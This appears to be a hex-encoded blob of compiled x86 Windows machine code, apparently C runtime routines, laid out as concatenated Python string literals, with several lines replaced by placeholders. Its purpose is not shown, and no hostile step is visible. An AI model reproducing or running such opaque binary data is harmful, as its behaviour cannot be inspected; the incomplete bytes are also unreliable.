'800f8400030000e8f2daffff8b406c33c93988a80000008d851ce5ffff508' \
'b8530e5ffff0f94c18b0485e0744200ff3406898d40e5ffffff15f4a04100' \
'85c00f84c202000039bd40e5ffff740884db0f84b2020000ff158ca041008' \
'b9544e5ffff21bd24e5ffff8bca898510e5ffff898d34e5ffff397d100f86' \
'7e02000033c0898538e5ffffc78518e5ffff0a00000084db0f858f0100008' \
'a0933c080f90a0f94c0898540e5ffff8b8530e5ffff8b1485e0744200837c' \
'16380074178a4416348845f46a028d45f4884df5836416380050eb5a0fbec' \
'150e82497ffff5985c074448b8544e5ffff8b9534e5ffff2bc203451083f8' \
'010f86d30100006a02528d853ce5ffff50e87a55000083c40c83f8ff0f84d' \
'b0100008b8534e5ffff40ff8538e5ffffeb266a01ffb534e5ffff8d853ce5' \
'ffff50e84b55000083c40c83f8ff0f84ac0100008b8534e5ffff33c951514' \
'0ff8538e5ffff6a05898534e5ffff8d45f4506a018d853ce5ffff5051ffb5' \
'10e5ffffff15bca1410089851ce5ffff85c00f846b0100006a008d8d24e5f' \
'fff51508d45f4508b8530e5ffff8b0485e0744200ff3406ff1504a1410085' \
'c00f84eb0400008bbd38e5ffff8b851ce5ffff03bd2ce5ffff398524e5fff' \
'f0f8c2101000083bd40e5ffff000f84da0000006a008d8524e5ffff506a01' \
'8d45f4508b8530e5ffffc645f40d8b0485e0744200ff3406ff1504a141008' \
'5c00f848f04000083bd24e5ffff010f8cd6000000ff852ce5ffff47e99000' \
'000080fb01740580fb0275330fb70133d2663b8518e5ffff89853ce5ffff8' \
'b8538e5ffff0f94c283c10283c002898d34e5ffff898538e5ffff899540e5' \
'ffff80fb01740580fb027555ffb53ce5ffffe82354000059663b853ce5fff' \
'f0f851604000083c70283bd40e5ffff0074246a0d585089853ce5ffffe8fa' \
'53000059663b853ce5ffff0f85ed03000047ff852ce5ffff8b8538e5ffff8' \
'b8d34e5ffff3b45100f82c4fdffffeb238b9d30e5ffff8a028b0c9de07442' \
'004788440e348b049de0744200c7440638010000008bb540e5ffffe9a9030' \
'0008bb540e5ffffe9a80300008b8530e5ffff8b0485e0744200f644060480' \
'0f84550300008b9544e5ffff33f689b538e5ffff84db0f85e10000008bc28' \
'9853ce5ffff3975100f869103000033c92bc28b953ce5ffff8d9d48e5ffff' \
'898d40e5ffff3b451073448a0a4240888d23e5ffff80f90a8b8d40e5ffff8' \
'9953ce5ffff750bff852ce5ffffc6030d43418a9523e5ffff88138b953ce5' \
'ffff4341898d40e5ffff81f9ff13000072b78b8d14e5ffff8d8548e5ffff2' \
'bd86a008d8528e5ffff50538d8548e5ffff508b8530e5ffff8b0485e07442' \
'00ff3401ff1504a1410085c00f84bb02000003bd28e5ffff8b9544e5ffff3' \
'99d28e5ffff0f8cb10200008b853ce5ffff2bc23b45108b853ce5ffff0f82' \
'35ffffffe9950200008bca80fb020f85fe000000898d40e5ffff3975100f8' \
'6a7020000c78518e5ffff0a00000083a51ce5ffff008bbd2ce5ffff8bc12b' \
'c28b951ce5ffff8d9d48e5ffff3b4510733e0fb73183c10283c002898d40e' \
'5ffff663bb518e5ffff75156a0d5966890b8b8d40e5ffff83c70283c30283' \
'c20266893383c20283c30281fafe13000072bd8b8d14e5ffff8d8548e5fff' \
'f2bd86a008d8528e5ffff50538d8548e5ffff508b8530e5ffff89bd2ce5ff' \
'ff8b0485e0744200ff3401ff1504a141008bb538e5ffff8bbd3ce5ffff85c' \
'00f84b401000003bd28e5ffff8b9544e5ffff89bd3ce5ffff399d28e5ffff' \
'0f8ca40100008b8d40e5ffff8bc12bc23b45100f8220ffffffe98c0100008' \
'b5d10898d24e5ffff85db0f84a7010000c78518e5ffff0a00000083a51ce5' \
'ffff008bb524e5ffff2bca8b951ce5ffff8d8548f9ffff3bcb733b0fb73e8' \
'3c60283c10289b524e5ffff663bbd18e5ffff75126a0d5e6689308bb524e5' \
'ffff83c00283c20266893883c20283c00281faa806000072c133f65656685' \
'50d00008d8df0ebffff518d8d48f9ffff2bc1992bc2d1f8508bc1505668e9' \
'fd0000ff15bca141008bb538e5ffff8bbd3ce5ffff898534e5ffff85c00f8' \
'4c200000033c9898d40e5ffff6a002bc18d9528e5ffff52508d85f0ebffff' \
'03c18b8d14e5ffff508b8530e5ffff8b0485e0744200ff3401ff1504a1410' \
'085c0741e8b8d40e5ffff038d28e5ffff8b8534e5ffff898d40e5ffff3bc1' \
'7fafeb1aff15c0a041008b8d40e5ffff8bf08b8534e5ffff89b538e5ffff3' \
'bc17f518b8d24e5ffff8b9544e5ffff8bf92bfa89bd3ce5ffff3bfb0f82c8' \
'feffffeb376a008d8d28e5ffff51ff7510ffb544e5ffffff3406ff1504a14' \
'10085c0740a8bbd28e5ffff33f6eb08ff15c0a041008bf08b9544e5ffff85' \
'ff756385f674246a055b3bf37514e80fd9ffffc70009000000e8d0d8ffff8' \
'918eb3f56e8d9d8ffff59eb368b8530e5ffff8b8d14e5ffff8b0485e07442' \
'00f6440104407409803a1a750433c0eb20e8cfd8ffffc7001c000000e890d' \
'8ffff83200083c8ffeb082bbd2ce5ffff8bc75e5b8b4dfc33cd5fe87f8fff' \
'ffc9c3a1b06d420083f8ff740c83f8fe740750ff15c4a04100c333c050506' \
'a03506a0368000000c068bcbc4100ff1514a14100a3b06d4200c3558bec56' \
'e8aed3ffff8bf085f60f84450100008b565c578b7d088bca3939740d83c10' \
'c8d82900000003bc872ef8d82900000003bc873043939740233c985c90f84' \
'100100008b510885d20f840501000083fa05750c8361080033c040e9f6000' \
'00083fa01750883c8ffe9e90000008b450c538b5e60894660837904080f85' \
'c00000006a245f8b465c83c70c836407fc0081ff900000007ced81398e000' \
'0c08b7e64750cc7466483000000e9860000008139900000c07509c7466481' \
'000000eb758139910000c07509c7466484000000eb648139930000c07509c' \
'7466485000000eb5381398d0000c07509c7466482000000eb4281398f0000' \
'c07509c7466486000000eb318139920000c07509c746648a000000eb20813' \
'9b50200c07509c746648d000000eb0f8139b40200c07507c746648e000000' \
'ff76646a08ffd259897e64eb09ff710483610800ffd259895e6083c8ff5be' \
'b0233c05f5e5dc3558bec837d08007515e806d7ffffc70016000000e88cd6' \
'ffff83c8ff5dc3ff75086a00ff359c7d4200ff15dca141005dc3cccc53568' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'4e33d28bc65e5bc21000558becb8ffff000083ec14663945080f849b00000' \
'056ff750c8d4dece8cc8dffff8b75ec8b86a800000085c075188b4d088d41' \
'bf6683f81977046683c1200fb7c10fb7c0eb1fba000100006a01663955087' \
'32aff7508e889cfffff595985c075090fb745080fb7c0eb0e0fb74d088b86' \
'940000000fb604080fb7c0eb1c8d4dfc516a018d4d08515250e82dd7ffff8' \
'3c41885c075090fb745080fb7c0eb040fb745fc807df8005e74078b4df483' \
'<KEY>' \
'50c578b7d14ff75108985d8fbffff33c08bd88d8db0fbffff89b5f8fbffff' \
'89bdf4fbffff8985acfbffff899df0fbffff8985dcfbffff8985e8fbffff8' \
'985d4fbffff8985c0fbffff8985d0fbffffe8ce8cffffe855d5ffff89859c' \
'fbffff399dd8fbffff752ae842d5ffffc70016000000e8c8d4ffff389dbcf' \
'bffff740a8b85b8fbffff836070fd83c8ffe9150b000085f674d233c98bc1' \
'8bd1898dccfbffff898da8fbffff0fb70e8985e0fbffff8995ecfbffff898' \
'de4fbffff6685c90f84ce0a00008bb594fbffffc7858cfbffff58000000c7' \
'8584fbffff64000000c78580fbffff69000000c78598fbffff6f000000838' \
'5f8fbffff0285c00f88910a00006a588d41e05f663bc7770f0fb7c10fbe80' \
'18bc410083e00feb0233c08bbdccfbffff0fbebcc738bc41008bc7c1f8048' \
'9bdccfbffff8bbdf4fbffff8985ccfbffff83f8070f87290a0000ff2485b6' \
'3f410033c0838de8fbffffff8bd88985a0fbffff8985c0fbffff8985dcfbf' \
'fff8985d4fbffff899df0fbffff8985d0fbffffe9ee0900000fb7c16a2059' \
'2bc1744683e803743983e808742f4848741d83e8038b85f8fbffff0f85cd0' \
'9000083cb08899df0fbffffe9bf09000083cb04899df0fbffffe9ab090000' \
'83cb01ebf081cb80000000ebe883cb02ebe36a2a58663bc8752f8b0783c70' \
'489bdf4fbffff8985dcfbffff85c00f897809000083cb04f7d8899df0fbff' \
'ff8985dcfbffffe9620900008b85dcfbffff6bc00a8985dcfbffff0fb7c18' \
'b8ddcfbffff83c1d003c8898ddcfbffffe93a09000033c08985e8fbffffe9' \
'2d0900006a2a58663bc8752b8b0783c7048985e8fbffff85c08b85f8fbfff' \
'f89bdf4fbffff0f890c090000838de8fbffffffe9000900008b85e8fbffff' \
'6bc00a8985e8fbffff0fb7c18b8de8fbffff83c1d003c8898de8fbffffe9d' \
'20800000fb7c183f849745783f86874486a6c593bc1741a83f8778b85f8fb' \
'ffff0f85b508000081cb00080000e9e0feffff8b85f8fbffff66390875148' \
'3c0028985f8fbffff81cb00100000e9c1feffff83cb10e9b9feffff6a2058' \
'0bd8e9bdfeffff8b85f8fbffff0fb70083f83675238bbdf8fbffff66837f0' \
'23475168bc783c0048985f8fbffff81cb00800000e97efeffff83f8337523' \
'8bbdf8fbffff66837f023275168bc783c0048985f8fbffff81e3ff7fffffe' \
'956feffff663b8584fbffff0f840d080000663b8580fbffff0f8400080000' \
'663b8598fbffff0f84f307000083f8750f84ea07000083f8780f84e107000' \
'0663b858cfbffff0f84d407000033c08985ccfbffff8d85e0fbffff50ffb5' \
'd8fbffffc785d0fbffff0100000051e83d08000083c40ce9a10700000fb7c' \
'183f8640f8f2b0200000f84b302000083f8530f8f27010000747d83e84174' \
'10484874584848740848480f859c0500006a205803c8c785a0fbffff01000' \
'000898de4fbffff8b85e8fbffff83cb40ba00020000899df0fbffff8db5fc' \
'fbffff8995ecfbffff85c00f8990020000c785e8fbffff06000000e9e1020' \
'000f7c3300800000f85da0000006a20580bd8899df0fbffffe9ca000000f7' \
'c330080000750b6a20580bd8899df0fbffff8b85e8fbffffbfffffff7f83f' \
'8ff74028bf88bb5f4fbffff83c60489b5f4fbffff8b76fcf6c3200f84c104' \
'000085f675068b35486c420033c98bc68bd18985e4fbffff8995ecfbffff8' \
'5ff0f8ed00400008a0084c00f84c60400008d8db0fbffff0fb6c05150e8c4' \
'88ffff5985c08b85e4fbffff597401408b95ecfbffff40428985e4fbffff8' \
'995ecfbffff3bd77cc1e98c04000083e8580f84dc02000048480f848b0000' \
'0083e8070f84ebfeffff48480f856a0400000fb70783c704c785d0fbffff0' \
'100000089bdf4fbffff8985a4fbfffff6c32074448885c4fbffff33c08885' \
'c5fbffff8d85b0fbffff508b85b0fbffffff70748d85c4fbffff508d85fcf' \
'bffff50e8ed45000083c41085c07913c785c0fbffff01000000eb07668985' \
'fcfbffff33d28db5fcfbffff42e9ea0300008b0783c70489bdf4fbffff85c' \
'074368b700485f6742ff7c30008000074170fbf00992bc28bd0c785d0fbff' \
'ff01000000e9b30300000fbf1033c9898dd0fbffffe9a50300008b35486c4' \
'20056e810b7ffff598bd0e99103000083f8700f8feb0100000f84d7010000' \
'83f8650f8c7f03000083f8670f8eeffdffff6a69593bc1746683f86e74276' \
'a6f593bc10f855f030000c785e4fbffff0800000084db795b81cb00020000' \
'899df0fbffffeb4d83c70489bdf4fbffff8b7ffce8b29effff85c00f84430' \
'500008b85e0fbfffff6c3207405668907eb028907c785c0fbffff01000000' \
'e9c304000083cb40899df0fbffffc785e4fbffff0a000000f7c3008000007' \
'50cf7c3001000000f84970100008b0f83c70889bdf4fbffff8b7ffce9b001' \
'000075146a6758663bc87556c785e8fbffff01000000eb4a3bc27e088bc28' \
'985e8fbffff3da30000007e378db85d01000057e88ee8ffff598b8de4fbff' \
'ff8985a8fbffff85c0740a8bf089bdecfbffffeb0ac785e8fbffffa300000' \
'08bbdf4fbffff8b0783c708898578fbffff8b47fc89857cfbffff8d85b0fb' \
'ffff50ffb5a0fbffff0fbec1ffb5e8fbffff89bdf4fbffff50ffb5ecfbfff' \
'f8d8578fbffff5650ff35786e4200ff15f8a14100ffd08bfb83c41c81e780' \
'000000742183bde8fbffff0075188d85b0fbffff5056ff35846e4200ff15f' \
'8a14100ffd059596a6758663985e4fbffff751c85ff75188d85b0fbffff50' \
'56ff35806e4200ff15f8a14100ffd05959803e2d0f851efeffff81cb00010' \
'000899df0fbffff46e90cfeffffc785e8fbffff080000006a07eb1c83e873' \
'0f8479fcffff48480f8492feffff83e8030f85890100006a27588985acfbf' \
'fffc785e4fbffff1000000084db0f8978feffff6a305983c05166898dc8fb' \
'ffff668985cafbffffc785d4fbffff02000000e955feffff83c70489bdf4f' \
'bfffff6c3207411f6c34074060fbf47fceb0e0fb747fceb08f6c340740c8b' \
'47fc998bc88bfa33c0eb078b4ffc33c08bf8f6c340741c3bf87f187c043bc' \
'87312f7d913f8f7df81cb00010000899df0fbfffff7c30090000075028bf8' \
'8b95e8fbffff85d2790533d242eb1683e3f7899df0fbffff81fa000200007' \
'e05ba000200008bc10bc775068985d4fbffff8db5fbfdffff8bc24a8995e8' \
'fbffff85c07f068bc10bc7743d8b85e4fbffff9952505751e8e039000083c' \
'130899d94fbffff8985ecfbffff8bfa83f9397e06038dacfbffff8b95e8fb' \
'ffff880e8b8decfbffff4eebb08b9df0fbffff8d95fbfdffff2bd6468995e' \
'cfbfffff7c300020000744585d27405803e30743c4e6a3058880642eb2d85' \
'f675068b354c6c4200c785d0fbffff010000008bd685ff740f33c04f66390' \
'2740783c20285ff75f32bd6d1fa8995ecfbffff83bdc0fbffff000f85ad01' \
'0000f6c3407420f7c3000100000f841d0100006a2d58668985c8fbffffc78' \
'5d4fbffff010000006a20598bbddcfbffff8b85d4fbffff2bfa2bf8f6c30c' \
'751d8d85e0fbffff50ffb5d8fbffff5751e83f0200008b85d4fbffff83c41' \
'0ffb59cfbffff8d8de0fbffff51ffb5d8fbffff508d85c8fbffff50e8e30f' \
'000083c414f6c308741ff6c304751a8d85e0fbffff50ffb5d8fbffff576a3' \
'05850e8f201000083c41083bdd0fbffff008b85ecfbffff0f85b300000085' \
'c00f8eab0000008bce89b5e4fbffff48898594fbffff8d85b0fbffff508b8' \
'5b0fbffffff70748d85a4fbffff5150e8e040000083c410898588fbffff85' \
'c07e678d85e0fbffff50ffb5d8fbffffffb5a4fbffffe84d0100008b8de4f' \
'bffff038d88fbffff8b8594fbffff83c40c898de4fbffff85c07f98eb56f6' \
'c30174076a2be9d9fefffff6c3020f84e2feffff6a205966898dc8fbffffc' \
'785d4fbffff01000000e9ccfeffff83c8ff8985e0fbffffeb23ffb59cfbff' \
'ff8d8de0fbffff51ffb5d8fbffff5056e8dc0e000083c4148b85e0fbffff8' \
'5c0781ff6c304741a8d85e0fbffff50ffb5d8fbffff576a205850e8e60000' \
'0083c4108b85a8fbffff85c0740f50e88daaffff33c0598985a8fbffff8b9' \
'5ecfbffff8b85f8fbffff0fb7088b85e0fbffff898de4fbffff6685c90f85' \
'60f5ffff80bdbcfbffff00740a8b8db8fbffff836170fd8b4dfc5f5e33cd5' \
'be8d380ffffc9c3e8f4c9ffffc70016000000e87ac9ffff80bdbcfbffff00' \
'0f84b7f4ffff8b8db8fbffff836170fde9a8f4ffff8bff7c3741002635410' \
'05a354100af3541000e3641001b36410076364100a1374100558bec8b450c' \
'f6400c40740683780800741d50ff7508e89f4000005959b9ffff0000663bc' \
'175088b45108308ff5dc38b4510ff005dc3558bec568b750c85f67e1e578b' \
'7d1457ff75104eff7508e8aeffffff83c40c833fff740485f67fe75f5e5dc' \
'3558bec568b750c5756e8a7ceffff598b4e0c8bf8f6c1827517e82bc9ffff' \
'c70009000000834e0c2083c8ffe919010000f6c140740de80fc9ffffc7002' \
'2000000ebe25333dbf6c1017413895e04f6c110747d8b460883e1fe890689' \
'4e0c8b460c83e0ef83c80289460c895e04a90c010000752ae84689ffff83c' \
'0203bf0740ce83a89ffff83c0403bf0750b57e8653400005985c0750756e8' \
'4141000059f7460c08010000747a8b56088b0e8d420189068b46182bca488' \
'94d0c89460485c97e17515257e8d0e6ffff83c40c8bd8eb4783c920894e0c' \
'eb6883ffff741b83fffe74168bcf8bc783e11fc1f805c1e106030c85e0744' \
'200eb05b9506c4200f641042074146a02535357e8933c000023c283c41083' \
'f8ff74258b4e088a45088801eb1633c0405089450c8d45085057e867e6fff' \
'f83c40c8bd83b5d0c7409834e0c2083c8ffeb040fb645085b5f5e5dc3558b' \
'ec81ec88040000a16063420033c58945fc8b450853568b750c578b7d14ff7' \
'5108985d8fbffff33c08bd88d8db4fbffff89b5f8fbffff89bdf4fbffff89' \
'85acfbffff899df0fbffff8985dcfbffff8985e8fbffff8985d4fbffff898' \
'5b0fbffff8985d0fbffffe8037fffffe88ac7ffff8985a4fbffff399dd8fb' \
'ffff752ae877c7ffffc70016000000e8fdc6ffff389dc0fbffff740a8b85b' \
'cfbffff836070fd83c8ffe9300b000085f674d233c98bc18bd1898dccfbff' \
'ff898da8fbffff0fb70e8985e0fbffff8995ecfbffff898de4fbffff6685c' \
'90f84e90a00008bb594fbffffc7858cfbffff58000000c78584fbffff6400' \
'0000c78580fbffff69000000c78598fbffff6f0000008385f8fbffff0285c' \
'00f889d0a00006a588d41e05f663bc7770f0fb7c10fb68088f7410083e00f' \
'eb0233c08bbdccfbffff6bc0090fb6bc38a8f741008bc7c1e80489bdccfbf' \
'fff8bbdf4fbffff8985ccfbffff83f8080f84ad0a000083f8070f87290a00' \
'00ff2485b94d410033c0838de8fbffffff8bd88985a0fbffff8985b0fbfff' \
'f8985dcfbffff8985d4fbffff899df0fbffff8985d0fbffffe9ee0900000f' \
'b7c16a20592bc1744683e803743983e808742f4848741d83e8038b85f8fbf' \
'fff0f85cd09000083cb08899df0fbffffe9bf09000083cb04899df0fbffff' \
'e9ab09000083cb01ebf081cb80000000ebe883cb02ebe36a2a58663bc8752' \
'<KEY>' \
'899df0fbffff8985dcfbffffe9620900008b85dcfbffff6bc00a8985dcfbf' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'8fbffffe9d20800000fb7c183f849745783f86874486a6c593bc1741a83f8' \
'<KEY>' \
'<KEY>' \
'ffff6a20580bd8e9bdfeffff8b85f8fbffff0fb70083f83675238bbdf8fbf' \
'fff66837f023475168bc783c0048985f8fbffff81cb00800000e97efeffff' \
'83f83375238bbdf8fbffff66837f023275168bc783c0048985f8fbffff81e' \
'3ff7fffffe956feffff663b8584fbffff0f840d080000663b8580fbffff0f' \
'8400080000663b8598fbffff0f84f307000083f8750f84ea07000083f8780' \
'f84e1070000663b858cfbffff0f84d407000033c08985ccfbffff8d85e0fb' \
'ffff50ffb5d8fbffffc785d0fbffff0100000051e866faffff83c40ce9a10' \
'700000fb7c183f8640f8f2b0200000f84b302000083f8530f8f2701000074' \
'7d83e8417410484874584848740848480f859c0500006a205803c8c785a0f' \
'bffff01000000898de4fbffff8b85e8fbffff83cb40ba00020000899df0fb' \
'ffff8db5fcfbffff8995ecfbffff85c00f8990020000c785e8fbffff06000' \
'000e9e1020000f7c3300800000f85da0000006a20580bd8899df0fbffffe9' \
'ca000000f7c330080000750b6a20580bd8899df0fbffff8b85e8fbffffbff' \
'fffff7f83f8ff74028bf88bb5f4fbffff83c60489b5f4fbffff8b76fcf6c3' \
'200f84c104000085f675068b35486c420033c98bc68bd18985e4fbffff899' \
'5ecfbffff85ff0f8ed00400008a0084c00f84c60400008d8db4fbffff0fb6' \
'c05150e8ed7affff5985c08b85e4fbffff597401408b95ecfbffff4042898' \
'5e4fbffff8995ecfbffff3bd77cc1e98c04000083e8580f84dc0200004848' \
'0f848b00000083e8070f84ebfeffff48480f856a0400000fb70783c704c78' \
'5d0fbffff0100000089bdf4fbffff89859cfbfffff6c32074448885c4fbff' \
'ff33c08885c5fbffff8d85b4fbffff508b85b4fbffffff70748d85c4fbfff' \
'f508d85fcfbffff50e81638000083c41085c07913c785b0fbffff01000000' \
'eb07668985fcfbffff33d28db5fcfbffff42e9ea0300008b0783c70489bdf' \
'4fbffff85c074368b700485f6742ff7c30008000074170fbf00992bc28bd0' \
'c785d0fbffff01000000e9b30300000fbf1033c9898dd0fbffffe9a503000' \
'08b35486c420056e839a9ffff598bd0e99103000083f8700f8feb0100000f' \
'84d701000083f8650f8c7f03000083f8670f8eeffdffff6a69593bc174668' \
'3f86e74276a6f593bc10f855f030000c785e4fbffff0800000084db795b81' \
'cb00020000899df0fbffffeb4d83c70489bdf4fbffff8b7ffce8db90ffff8' \
'5c00f84520500008b85e0fbfffff6c3207405668907eb028907c785b0fbff' \
'ff01000000e9c304000083cb40899df0fbffffc785e4fbffff0a000000f7c' \
'300800000750cf7c3001000000f84970100008b0f83c70889bdf4fbffff8b' \
'7ffce9b001000075146a6758663bc87556c785e8fbffff01000000eb4a3bc' \
'27e088bc28985e8fbffff3da30000007e378db85d01000057e8b7daffff59' \
'8b8de4fbffff8985a8fbffff85c0740a8bf089bdecfbffffeb0ac785e8fbf' \
'fffa30000008bbdf4fbffff8b0783c708898578fbffff8b47fc89857cfbff' \
'ff8d85b4fbffff50ffb5a0fbffff0fbec1ffb5e8fbffff89bdf4fbffff50f' \
'fb5ecfbffff8d8578fbffff5650ff35786e4200ff15f8a14100ffd08bfb83' \
'c41c81e780000000742183bde8fbffff0075188d85b4fbffff5056ff35846' \
'e4200ff15f8a14100ffd059596a6758663985e4fbffff751c85ff75188d85' \
'b4fbffff5056ff35806e4200ff15f8a14100ffd05959803e2d0f851efefff' \
'f81cb00010000899df0fbffff46e90cfeffffc785e8fbffff080000006a07' \
'eb1c83e8730f8479fcffff48480f8492feffff83e8030f85890100006a275' \
'88985acfbffffc785e4fbffff1000000084db0f8978feffff6a305983c051' \
'66898dc8fbffff668985cafbffffc785d4fbffff02000000e955feffff83c' \
'70489bdf4fbfffff6c3207411f6c34074060fbf47fceb0e0fb747fceb08f6' \
'c340740c8b47fc998bc88bfa33c0eb078b4ffc33c08bf8f6c340741c3bf87' \
'f187c043bc87312f7d913f8f7df81cb00010000899df0fbfffff7c3009000' \
'0075028bf88b95e8fbffff85d2790533d242eb1683e3f7899df0fbffff81f' \
'a000200007e05ba000200008bc10bc775068985d4fbffff8db5fbfdffff8b' \
'c24a8995e8fbffff85c07f068bc10bc7743d8b85e4fbffff9952505751e80' \
'92c000083c130899d94fbffff8985ecfbffff8bfa83f9397e06038dacfbff' \
'ff8b95e8fbffff880e8b8decfbffff4eebb08b9df0fbffff8d95fbfdffff2' \
'bd6468995ecfbfffff7c300020000744585d27405803e30743c4e6a305888' \
'0642eb2d85f675068b354c6c4200c785d0fbffff010000008bd685ff740f3' \
'3c04f663902740783c20285ff75f32bd6d1fa8995ecfbffff83bdb0fbffff' \
'000f85ad010000f6c3407420f7c3000100000f841d0100006a2d58668985c' \
'8fbffffc785d4fbffff010000006a20598bbddcfbffff8b85d4fbffff2bfa' \
'2bf8f6c30c751d8d85e0fbffff50ffb5d8fbffff5751e868f4ffff8b85d4f' \
'bffff83c410ffb5a4fbffff8d8de0fbffff51ffb5d8fbffff508d85c8fbff' \
'ff50e80c02000083c414f6c308741ff6c304751a8d85e0fbffff50ffb5d8f' \
'bffff576a305850e81bf4ffff83c41083bdd0fbffff008b85ecfbffff0f85' \
'b300000085c00f8eab0000008bce89b5e4fbffff48898594fbffff8d85b4f' \
'bffff508b85b4fbffffff70748d859cfbffff5150e80933000083c4108985' \
'88fbffff85c07e678d85e0fbffff50ffb5d8fbffffffb59cfbffffe876f3f' \
'fff8b8de4fbffff038d88fbffff8b8594fbffff83c40c898de4fbffff85c0' \
'7f98eb56f6c30174076a2be9d9fefffff6c3020f84e2feffff6a205966898' \
'dc8fbffffc785d4fbffff01000000e9ccfeffff83c8ff8985e0fbffffeb23' \
'ffb5a4fbffff8d8de0fbffff51ffb5d8fbffff5056e80501000083c4148b8' \
'5e0fbffff85c0781ff6c304741a8d85e0fbffff50ffb5d8fbffff576a2058' \
'50e80ff3ffff83c4108b85a8fbffff85c0740f50e8b69cffff33c0598985a' \
'8fbffff8b95ecfbffff8b85f8fbffff0fb7088b85e0fbffff898de4fbffff' \
'6685c90f8554f5ffff8b8dccfbffff85c9740583f907754e80bdc0fbffff0' \
'0740a8b8dbcfbffff836170fd8b4dfc5f5e33cd5be8ed72ffffc9c3e80ebc' \
'ffffc70016000000e894bbffff80bdc0fbffff000f849cf4ffff8b8dbcfbf' \
'fff836170fde98df4ffffe8e2bbffffc70016000000e868bbffff80bdc0fb' \
'ffff00e965f4ffff8d490053454100fd4241003143410086434100e543410' \
'0f24341004d44410078454100558bec568b7518578b7d108b06f6470c4089' \
'45187410837f0800750a8b4d148b450c0101eb4f832600538b5d0c85db7e4' \
'18b4514508b4508570fb700504be8baf1ffff8b45148345080283c40c8338' \
'ff7514833e2a751350576a3fe89df1ffff8b451483c40c85db7fca833e007' \
'5058b451889065b5f5e5dc36a03e8070900005983f80174156a03e8fa0800' \
'005985c0751f833d6877420001751668fc000000e83400000068ff000000e' \
'82a0000005959c3558bec8b4d0833c03b0cc5f0c54100740a4083f81772f1' \
'33c05dc38b04c5f4c541005dc3cccccc558bec81ecfc010000a1606342003' \
'3c58945fc568b75085756e8bbffffff8bf85985ff0f8479010000536a03e8' \
'7d0800005983f8010f840f0100006a03e86c0800005985c0750d833d68774' \
'200010f84f600000081fefc0000000f84410100006804c741006814030000' \
'6870774200e8afbaffff83c40c33db85c00f852f010000680401000068a27' \
'742005366a3aa794200ff1544a14100befb02000085c0751b6838c7410056' \
'68a2774200e872baffff83c40c85c00f85f400000068a2774200e8df24000' \
'0405983f83c763568a2774200e8ce2400008d0c452c7742008bc12da27742' \
'006a03d1f86868c741002bf05651e8c724000083c41485c00f85ae0000006' \
'870c741006814030000be7077420056e82224000083c40c85c00f858e0000' \
'0057681403000056e80b24000083c40c85c0757b68102001006878c741005' \
'6e86432000083c40ceb576af4ff15cca041008bf085f6744983feff744433' \
'db8bcb8a044f88840d08feffff66391c4f74094181f9f401000072e7538d8' \
'504feffff508d8508feffff50885dfbe89da0ffff59508d8508feffff5056' \
'ff1504a141005b8b4dfc5f33cd5ee8f96fffffc9c35353535353e8b6b8fff' \
'<KEY>' \
'5dc3e88d29000085c074086a16e8ab29000059f605c06d42000274216a17e' \
'8ed39000085c074056a0759cd296a0168150000406a03e8f3b6ffff83c40c' \
'6a03e83dd4ffffcc558bec8b4508a3987d42005dc3558bec83ec348d4dccf' \
'<KEY>' \
'1485c0741f83f8027c0583f8247e15e869b8ffffc70016000000e8efb7fff' \
'fe9680200000fb7198bfa6a08538955fc897dec895df48d7102e8abb1ffff' \
'595985c0741d0fb73e6a0857897df483c602e894b1ffff595985c075e98b7' \
'dec8b5df48b45186683fb2d750583c802eb066683fb2b75090fb71e83c602' \
'895df48945f88b451485c00f88f501000083f8010f84ec01000083f8240f8' \
'fe301000085c0753053e8923200005985c074086a0a58894514eb4d0fb706' \
'6a7859663bc1740c6a5859663bc174046a08ebe36a105889451483f810752' \
'b53e85d3200005985c0751d0fb7066a7859663bc174086a5859663bc1750a' \
'0fb75e02895df483c6048b4514998bca51506aff6aff8945dc894de0e8a72' \
'40000895de88b5df4894de48945f08955ec53e80f320000598bc88945f483' \
'f9ff75576a4158663bc377066683fb5a76326a198d439f59663bc1762a8b4' \
'5fc8b5df88b4d1083ee02f6c3080f859300000085c974038b750c33d28bc2' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'df885c97488eb1a5750ff75e0ff75dce8fe3200000345f46a008945fc8bfa' \
'5813f80fb71e83c602e92efffffff6c3047533f6c30175658bcb83e102741' \
'281ff00000080771f720833d23bc27717eb0233d285c9754181ffffffff7f' \
'7239770583f8ff7632e84ab6ffffc70022000000f6c301740883c8ff83cff' \
'feb22f6c302740b33d28bc2bf00000080eb1483c8ffbfffffff7feb088b45' \
'fceb058b45fc33d28b4d1085c974028931f6c302741af7d813faf7dfeb128' \
'b451085c074058b4d0c890833c98bc18bf9807dd80074078b4dd4836170fd' \
'<KEY>' \
'<KEY>' \
'6de0752583781003751f8b40143d20059319741b3d2105931974143d22059' \
'319740d3d00409901740633c05dc20400e810070000cc68d4534100e895ba' \
'ffff5933c0c3ff1520a1410033c985c00f95c1a39c7d42008bc1c3558bec5' \
'1515356576804010000bba07d42005333c033ff5766a3a87f4200ff1544a1' \
'<KEY>' \
'<KEY>' \
'ff7f73418d0c5803c903c03bc8723651e8b7ceffff8bf85985ff74298d45f' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'c7450820000000c745fc090000006a2258663901751133c085ff0f94c06a2' \
'283c1028bf858eb1aff0385d27409668b0166890283c2020fb70183c10266' \
'<KEY>' \
'b0383e9028b7d1833db895df86639190f84df0000000fb701663b45087406' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'6dffffff8975f88b750c85d2740833c066890283c202ff0733dbe918fffff' \
'f85f67402891e8b45145fff005e5bc9c353568b359874420033db578bfb85' \
'f6751b83c8ffe9a1000000663bc174014756e8c11d00008d34465983c6020' \
'fb7066a3d596685c075e28d47016a0450e866ccffff8bf85959893d5c7742' \
'0085ff74c18b359874420066391e744456e8851d0000596a3d8d580158663' \
'90674226a0253e833ccffff5959890785c07441565350e8dfb2ffff83c40c' \
'85c0754983c7048d345e33db66391e75c28b359874420056e8b092ffff891' \
'd98744200891fc705cc8042000100000033c0595f5e5bc3ff355c774200e8' \
'8c92ffff83255c7742000083c8ffebe433c05050505050e8d0b1ffffcc558' \
'<KEY>' \
'<KEY>' \
'016000000e877b1ffff83c8ff5dc3558bec83ec14a1606342008365f40083' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
